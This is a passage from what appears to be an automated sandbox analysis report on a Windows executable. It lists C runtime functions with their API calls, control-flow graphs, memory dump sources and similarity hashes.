                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 00616E71A50218BFEB11DBD4DC4AFAFBBB9FF48B50F160018E615B7290C77299018BA4

                                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                                        Function 00AC191F Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00AC192B
                                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 00AC19F7
                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00AC1A10
                                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00AC1A1A
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 254469556-0
                                                                                                                                                                                                                                                        • Opcode ID: 292e8f82035c5d0098795f08eeb26fd0548a43a73b55a7361403bc927ad2cdef
                                                                                                                                                                                                                                                        • Instruction ID: e349efd10c5b631558ea50a50aa8eae8a03d831d39a81676bd79a8fd0e943bc0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 292e8f82035c5d0098795f08eeb26fd0548a43a73b55a7361403bc927ad2cdef
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B63106B5D012189BDF21DFA4D949BCDBBB8AF08300F1141AAE50CAB250EB759A85CF55
                                                                                                                                                                                                                                                        Function 00AC4573 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00AC466B
                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00AC4675
                                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00AC4682
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3906539128-0
                                                                                                                                                                                                                                                        • Opcode ID: d6489621f014e850a04423b4e6ac55bd7350c5aa35b710254fac59025532c130
                                                                                                                                                                                                                                                        • Instruction ID: 7bfab8367fa30ca48616769390a2749de1708cdcd848902e11907f972421780f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d6489621f014e850a04423b4e6ac55bd7350c5aa35b710254fac59025532c130
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3831D3749012189BCB21DF64D989B8DBBB8BF18310F5141EAE81CA7251EB749F858F45
                                                                                                                                                                                                                                                        Function 00AC3677 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,00AC364D,?,00AD02E0,0000000C,00AC37A4,?,00000002,00000000,?,00AC3F66,00000003,00AC209F,00AC1AFC), ref: 00AC3698
                                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,00AC364D,?,00AD02E0,0000000C,00AC37A4,?,00000002,00000000,?,00AC3F66,00000003,00AC209F,00AC1AFC), ref: 00AC369F
                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00AC36B1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                                                                                                        • Opcode ID: f4e9113eafa24157be0ce62806be8e2939988f4b42369e49663a8d92e13265e7
                                                                                                                                                                                                                                                        • Instruction ID: 9460b21b90b6d96ac055584828acb2be93ced47252f5b8a3c8930660f62ade98
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f4e9113eafa24157be0ce62806be8e2939988f4b42369e49663a8d92e13265e7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 07E0BF32410548AFCF11AF94DE0AF5F3B69EF44345F024418F95557231DB36DD42DA64
                                                                                                                                                                                                                                                        Function 00AC4A4B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: .
                                                                                                                                                                                                                                                        • API String ID: 0-248832578
                                                                                                                                                                                                                                                        • Opcode ID: 9c91acd4e656762697a24f35ed885871f019e4a53feb6c363d6e60e6aafb459e
                                                                                                                                                                                                                                                        • Instruction ID: d2ee55c27e5a411bfdb5c185941bd31444f24e676de470305430f2e6401bc8c9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9c91acd4e656762697a24f35ed885871f019e4a53feb6c363d6e60e6aafb459e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A31FE72800249ABCB24CF78CC94FEA7BBDEB8A354F0141ADF81997251EA309D418B64
                                                                                                                                                                                                                                                        Function 00ACA495 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00ACA490,?,?,00000008,?,?,00ACA130,00000000), ref: 00ACA6C2
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionRaise
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3997070919-0
                                                                                                                                                                                                                                                        • Opcode ID: 1a16d291f1e5434a2df475ed504dba6d7a15cfc5fb178792368074412f2e3b9f
                                                                                                                                                                                                                                                        • Instruction ID: b76f0633aa75f709c159bfdc3ba3d7b1406acbcde74415f82e329f46c7652241
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1a16d291f1e5434a2df475ed504dba6d7a15cfc5fb178792368074412f2e3b9f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FBB139316106089FD719CF28C58AB647BF0FF54368F2A865CE89ACF2A1C335D992CB41
                                                                                                                                                                                                                                                        Function 00AC1BD4 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00AC1BEA
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2325560087-0
                                                                                                                                                                                                                                                        • Opcode ID: a0b61f4d320981cf247abc7ce7d430a59b5808b5477c2449e7147c583447bd73
                                                                                                                                                                                                                                                        • Instruction ID: b5e7dc3f32af9f841d38479bc855d144911d8cb7ac335f8b148e2aa5c648eece
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a0b61f4d320981cf247abc7ce7d430a59b5808b5477c2449e7147c583447bd73
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E519AB1E112059BEB15CFA4D881BAEBBF0FB49304F25802AD402EB295E3749942CF50
                                                                                                                                                                                                                                                        Function 00AC1AAC Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00001AB8,00AC1300), ref: 00AC1AB1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                                                                        • Opcode ID: d39058dc16bfd2a36a75d98a4e7b77f282d1b003af782c3d25827000d168802a
                                                                                                                                                                                                                                                        • Instruction ID: b2cd0899256a3bafc018f0c4f57ddd3d3f581722504f1a946e98ed02634ca1ca
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d39058dc16bfd2a36a75d98a4e7b77f282d1b003af782c3d25827000d168802a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                        Function 00AC6893 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: HeapProcess
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 54951025-0
                                                                                                                                                                                                                                                        • Opcode ID: 4df5ad5b2df120434a509c8fe5687309ae5f8788f0cea0ed293cae3a75ca0138
                                                                                                                                                                                                                                                        • Instruction ID: 36234be736e80ff812768219bc91d5bb70a88dfbf902d22dd0d350e7eccad531
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4df5ad5b2df120434a509c8fe5687309ae5f8788f0cea0ed293cae3a75ca0138
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A5A012302011019B4300CF715A4630876985500580B0641156006C1030D72040419B11
                                                                                                                                                                                                                                                        Function 00AC6507 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 81 ac6507-ac651b 82 ac651d-ac6522 81->82 83 ac6589-ac6591 81->83 82->83 86 ac6524-ac6529 82->86 84 ac65d8-ac65f0 call ac667a 83->84 85 ac6593-ac6596 83->85 93 ac65f3-ac65fa 84->93 85->84 89 ac6598-ac65d5 call ac4869 * 4 85->89 86->83 88 ac652b-ac652e 86->88 88->83 91 ac6530-ac6538 88->91 89->84 94 ac653a-ac653d 91->94 95 ac6552-ac655a 91->95 97 ac65fc-ac6600 93->97 98 ac6619-ac661d 93->98 94->95 99 ac653f-ac6551 call ac4869 call ac6078 94->99 100 ac655c-ac655f 95->100 101 ac6574-ac6588 call ac4869 * 2 95->101 104 ac6616 97->104 105 ac6602-ac6605 97->105 109 ac661f-ac6624 98->109 110 ac6635-ac6641 98->110 99->95 100->101 107 ac6561-ac6573 call ac4869 call ac6176 100->107 101->83 104->98 105->104 113 ac6607-ac6615 call ac4869 * 2 105->113 107->101 117 ac6626-ac6629 109->117 118 ac6632 109->118 110->93 112 ac6643-ac6650 call ac4869 110->112 113->104 117->118 125 ac662b-ac6631 call ac4869 117->125 118->110 125->118
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • ___free_lconv_mon.LIBCMT ref: 00AC654B
                                                                                                                                                                                                                                                          • Part of subcall function 00AC6078: _free.LIBCMT ref: 00AC6095
                                                                                                                                                                                                                                                          • Part of subcall function 00AC6078: _free.LIBCMT ref: 00AC60A7
                                                                                                                                                                                                                                                          • Part of subcall function 00AC6078: _free.LIBCMT ref: 00AC60B9
                                                                                                                                                                                                                                                          • Part of subcall function 00AC6078: _free.LIBCMT ref: 00AC60CB
                                                                                                                                                                                                                                                          • Part of subcall function 00AC6078: _free.LIBCMT ref: 00AC60DD
                                                                                                                                                                                                                                                          • Part of subcall function 00AC6078: _free.LIBCMT ref: 00AC60EF
                                                                                                                                                                                                                                                          • Part of subcall function 00AC6078: _free.LIBCMT ref: 00AC6101
                                                                                                                                                                                                                                                          • Part of subcall function 00AC6078: _free.LIBCMT ref: 00AC6113
                                                                                                                                                                                                                                                          • Part of subcall function 00AC6078: _free.LIBCMT ref: 00AC6125
                                                                                                                                                                                                                                                          • Part of subcall function 00AC6078: _free.LIBCMT ref: 00AC6137
                                                                                                                                                                                                                                                          • Part of subcall function 00AC6078: _free.LIBCMT ref: 00AC6149
                                                                                                                                                                                                                                                          • Part of subcall function 00AC6078: _free.LIBCMT ref: 00AC615B
                                                                                                                                                                                                                                                          • Part of subcall function 00AC6078: _free.LIBCMT ref: 00AC616D
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC6540
                                                                                                                                                                                                                                                          • Part of subcall function 00AC4869: HeapFree.KERNEL32(00000000,00000000,?,00AC620D,?,00000000,?,00000000,?,00AC6234,?,00000007,?,?,00AC669F,?), ref: 00AC487F
                                                                                                                                                                                                                                                          • Part of subcall function 00AC4869: GetLastError.KERNEL32(?,?,00AC620D,?,00000000,?,00000000,?,00AC6234,?,00000007,?,?,00AC669F,?,?), ref: 00AC4891
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC6562
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC6577
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC6582
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC65A4
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC65B7
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC65C5
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC65D0
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC6608
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC660F
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC662C
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC6644
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 161543041-0
                                                                                                                                                                                                                                                        • Opcode ID: 55d29b6b8a71873846e6bc8e45bf33ea8706c4aac75cddde3fe86eca97342613
                                                                                                                                                                                                                                                        • Instruction ID: 004dd7d1ae5a5a1258d27bf6e9dc01e681dfe0122284ab87145eae4b195c49e7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 55d29b6b8a71873846e6bc8e45bf33ea8706c4aac75cddde3fe86eca97342613
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A314975600604DFEB64EB7AEA15F9AB3E8EF44310F26452EF049D7191DE31ED808B64
                                                                                                                                                                                                                                                        Function 00AC4330 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 138 ac4330-ac4341 139 ac434d-ac43d8 call ac4869 * 9 call ac41f6 call ac4246 138->139 140 ac4343-ac434c call ac4869 138->140 140->139
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC4344
                                                                                                                                                                                                                                                          • Part of subcall function 00AC4869: HeapFree.KERNEL32(00000000,00000000,?,00AC620D,?,00000000,?,00000000,?,00AC6234,?,00000007,?,?,00AC669F,?), ref: 00AC487F
                                                                                                                                                                                                                                                          • Part of subcall function 00AC4869: GetLastError.KERNEL32(?,?,00AC620D,?,00000000,?,00000000,?,00AC6234,?,00000007,?,?,00AC669F,?,?), ref: 00AC4891
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC4350
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC435B
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC4366
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC4371
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC437C
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC4387
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC4392
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC439D
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC43AB
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                        • Opcode ID: 5a3be1c752c8d0ec0666802ac6dae0bd40187a3cf96e871aaacc954bd16669d7
                                                                                                                                                                                                                                                        • Instruction ID: b372f195f187f35dff0d32afa3d7919245c8a27b57fe1ff608ad74f2642b3f49
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5a3be1c752c8d0ec0666802ac6dae0bd40187a3cf96e871aaacc954bd16669d7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8711CB7A600148FFDB41EF96DA52EDD3B75EF48750F0241AAF9084F262DA31DE509B84
                                                                                                                                                                                                                                                        Function 00AC7AB4 Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 165 ac7ab4-ac7acd 166 ac7acf-ac7adf call ac82cc 165->166 167 ac7ae3-ac7ae8 165->167 166->167 177 ac7ae1 166->177 168 ac7aea-ac7af2 167->168 169 ac7af5-ac7b19 MultiByteToWideChar 167->169 168->169 171 ac7cac-ac7cbf call ac123a 169->171 172 ac7b1f-ac7b2b 169->172 174 ac7b2d-ac7b3e 172->174 175 ac7b7f 172->175 178 ac7b5d-ac7b63 174->178 179 ac7b40-ac7b4f call acac20 174->179 181 ac7b81-ac7b83 175->181 177->167 183 ac7b64 call ac62ff 178->183 185 ac7ca1 179->185 192 ac7b55-ac7b5b 179->192 184 ac7b89-ac7b9c MultiByteToWideChar 181->184 181->185 189 ac7b69-ac7b6e 183->189 184->185 186 ac7ba2-ac7bbd call ac5a15 184->186 187 ac7ca3-ac7caa call ac646a 185->187 186->185 197 ac7bc3-ac7bca 186->197 187->171 189->185 193 ac7b74 189->193 196 ac7b7a-ac7b7d 192->196 193->196 196->181 198 ac7bcc-ac7bd1 197->198 199 ac7c04-ac7c10 197->199 198->187 200 ac7bd7-ac7bd9 198->200 201 ac7c5c 199->201 202 ac7c12-ac7c23 199->202 200->185 203 ac7bdf-ac7bf9 call ac5a15 200->203 204 ac7c5e-ac7c60 201->204 205 ac7c3e-ac7c44 202->205 206 ac7c25-ac7c34 call acac20 202->206 203->187 218 ac7bff 203->218 209 ac7c9a-ac7ca0 call ac646a 204->209 210 ac7c62-ac7c7b call ac5a15 204->210 207 ac7c45 call ac62ff 205->207 206->209 221 ac7c36-ac7c3c 206->221 212 ac7c4a-ac7c4f 207->212 209->185 210->209 223 ac7c7d-ac7c84 210->223 212->209 217 ac7c51 212->217 222 ac7c57-ac7c5a 217->222 218->185 221->222 222->204 224 ac7c86-ac7c87 223->224 225 ac7cc0-ac7cc6 223->225 226 ac7c88-ac7c98 WideCharToMultiByte 224->226 225->226 226->209 227 ac7cc8-ac7ccf call ac646a 226->227 227->187
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,00AC54C8,00000000,?,?,?,00AC7D05,?,?,00000100), ref: 00AC7B0E
                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00AC7B46
                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00AC7D05,?,?,00000100,5EFC4D8B,?,?), ref: 00AC7B94
                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00AC7C2B
                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00AC7C8E
                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00AC7C9B
